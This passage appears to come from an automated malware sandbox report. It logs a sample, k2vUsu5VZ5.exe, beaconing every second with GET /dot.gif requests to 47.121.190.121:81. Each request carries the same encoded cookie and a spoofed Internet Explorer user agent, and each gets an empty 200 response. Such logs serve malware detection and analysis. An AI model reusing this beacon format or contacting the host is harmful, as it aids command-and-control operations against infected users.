              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:09.902756929 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:09 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              12192.168.2.44974247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:10.014218092 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:11.005397081 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:10 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              13192.168.2.44974347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:11.137886047 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:12.090567112 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:11 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              14192.168.2.44974647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:12.223458052 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:13.200107098 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:13 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              15192.168.2.44974947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:13.309554100 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:14.316638947 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:14 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              16192.168.2.44975147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:14.434680939 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:15.419775963 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:15 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              17192.168.2.44975347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:15.530555964 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:16.468209982 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:16 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              18192.168.2.44975447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:16.797921896 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:17.793488979 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:17 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              19192.168.2.44975547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:17.904405117 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:19.000231981 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:18 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              20192.168.2.44975647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:19.122412920 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:20.074717045 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:19 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              21192.168.2.44975747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:20.184319973 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:21.138092995 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:20 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              22192.168.2.44975847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:21.247315884 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:22.208900928 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:22 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              23192.168.2.44975947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:22.326389074 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:23.269861937 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:23 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              24192.168.2.44976047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:23.388303041 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:24.458345890 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:24 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              25192.168.2.44976147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:24.575943947 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:25.509737015 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:25 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              26192.168.2.44976247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:25.622783899 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:26.690182924 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:26 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              27192.168.2.44976347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:26.825442076 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:27.760310888 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:27 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              28192.168.2.44976447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:27.875926018 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:28.944737911 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:28 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              29192.168.2.44976547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:29.060045958 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:30.022381067 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:29 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              30192.168.2.44976647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:30.139976025 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:31.133658886 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:30 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              31192.168.2.44976747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:31.251285076 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:32.192966938 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:32 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              32192.168.2.44976847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:32.309835911 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:33.245162010 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:33 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              33192.168.2.44976947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:33.356292009 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:34.335721016 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:34 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              34192.168.2.44977047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:34.450592041 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:35.858690023 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:35 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              35192.168.2.44977147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:35.981336117 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:36.989368916 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:36 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              36192.168.2.44977247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:37.106453896 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:38.061669111 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:37 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              37192.168.2.44977347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:38.210406065 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:39.150245905 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:38 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              38192.168.2.44977447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:39.263084888 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:40.326354027 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:40 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              39192.168.2.44977547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:40.450764894 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:41.578259945 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:41 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              40192.168.2.44977647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:41.700495005 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
